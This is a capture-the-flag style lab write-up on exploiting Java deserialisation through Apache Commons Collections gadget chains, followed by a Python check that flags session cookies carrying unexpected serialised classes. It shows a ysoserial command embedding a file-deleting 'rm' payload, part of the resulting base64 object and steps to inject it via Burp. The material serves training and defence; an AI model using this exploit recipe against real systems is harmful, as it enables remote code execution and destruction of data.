Exploiting Java deserialisation with Apache Commons

Description

This lab uses a serialisation-based session mechanism and loads the Apache Commons Collections library.

Reproduction

  1. Log in with wiener:peter. The session cookie is URL-encoded and base64-encoded and contains a serialised Java object (once decoded, the first two bytes are ac ed, the Java serialisation stream magic). Send a request containing the session cookie to Burp Repeater.

  2. Download the ysoserial tool and, if need be, make the changes necessary to run it on Kali.

  3. Execute the command to generate a Base64-encoded serialised object containing an RCE payload. The application uses the Apache Commons Collections library, so use a CommonsCollections payload:

$ java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBh
cmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAQm9yZy5hcGFjaGUuY29tbW9u
cy5jb2xsZWN0aW9uczQuY29tcGFyYXRvcnMuVHJhbnNmb3JtaW5nQ29tcGFyYXRvci/5hPArsQjM
AgACTAAJZGVjb3JhdGVkcQB+AAFMAAt0cmFuc2Zvcm1lcnQALUxvcmcvYXBhY2hlL2NvbW1vbnMv
...
  4. In Burp Repeater, replace the session cookie with the malicious one just created. Select the entire cookie and then URL-encode it.

  5. Send the request to solve the lab.
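An added defender-side check (my own example, not code from the lab or this writeup): it decodes a session cookie the way the lab encodes it (URL encoding over base64), reads the Java serialisation stream header the writeup mentions, and flags any cookie whose outermost class is not the application's own session class. The class name `data.session.Session` is a hypothetical stand-in for that class, and the sample streams are constructed in the code.

```python
import base64
import urllib.parse

STREAM_MAGIC = b"\xac\xed"      # the 'aced' bytes the writeup points out
STREAM_VERSION = b"\x00\x05"
TC_OBJECT = 0x73                # 's': start of a serialised object
TC_CLASSDESC = 0x72             # 'r': inline class descriptor follows

def decode_cookie(cookie: str) -> bytes:
    """Undo the URL encoding, then the base64 encoding, of the session cookie."""
    return base64.b64decode(urllib.parse.unquote(cookie), validate=True)

def top_level_class(data: bytes):
    """Return the class name of the outermost object in a Java serialisation
    stream, or None if the bytes are not a stream beginning with TC_OBJECT."""
    if data[:4] != STREAM_MAGIC + STREAM_VERSION:
        return None
    if len(data) < 8 or data[4] != TC_OBJECT or data[5] != TC_CLASSDESC:
        return None
    name_len = int.from_bytes(data[6:8], "big")   # 2-byte length prefix
    name = data[8:8 + name_len]
    if len(name) != name_len:                      # truncated stream
        return None
    return name.decode("utf-8", errors="replace")

def classify_cookie(cookie: str, allowed_classes) -> str:
    """'expected' if the cookie carries one of the allowed session classes,
    'unexpected-class' for any other class, 'not-serialized' otherwise."""
    try:
        data = decode_cookie(cookie)
    except ValueError:          # binascii.Error is a ValueError subclass
        return "not-serialized"
    cls = top_level_class(data)
    if cls is None:
        return "not-serialized"
    return "expected" if cls in allowed_classes else "unexpected-class"

def constructed_stream(class_name: str) -> bytes:
    """Constructed sample: only the stream header plus the outermost class
    descriptor prefix, which is all the check above inspects."""
    name = class_name.encode()
    return (STREAM_MAGIC + STREAM_VERSION + bytes([TC_OBJECT, TC_CLASSDESC])
            + len(name).to_bytes(2, "big") + name)

def encode_cookie(data: bytes) -> str:
    """Base64-encode and then URL-encode, mirroring how the lab's cookie is built."""
    return urllib.parse.quote(base64.b64encode(data).decode())
```

Run against the first 42 characters of the base64 output printed above (with `==` padding added), `classify_cookie` reports `unexpected-class`, because that stream's outermost object is a `java.util.PriorityQueue` rather than a session object.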

PoC


Exploitability

Although attackers do not have source code access, they can still exploit this lab using pre-built gadget chains. An attacker will need to log in; use a third-party tool to generate a malicious serialised object containing a remote code execution payload; and pass this object into the website to delete the morale.txt file from Carlos’s home directory.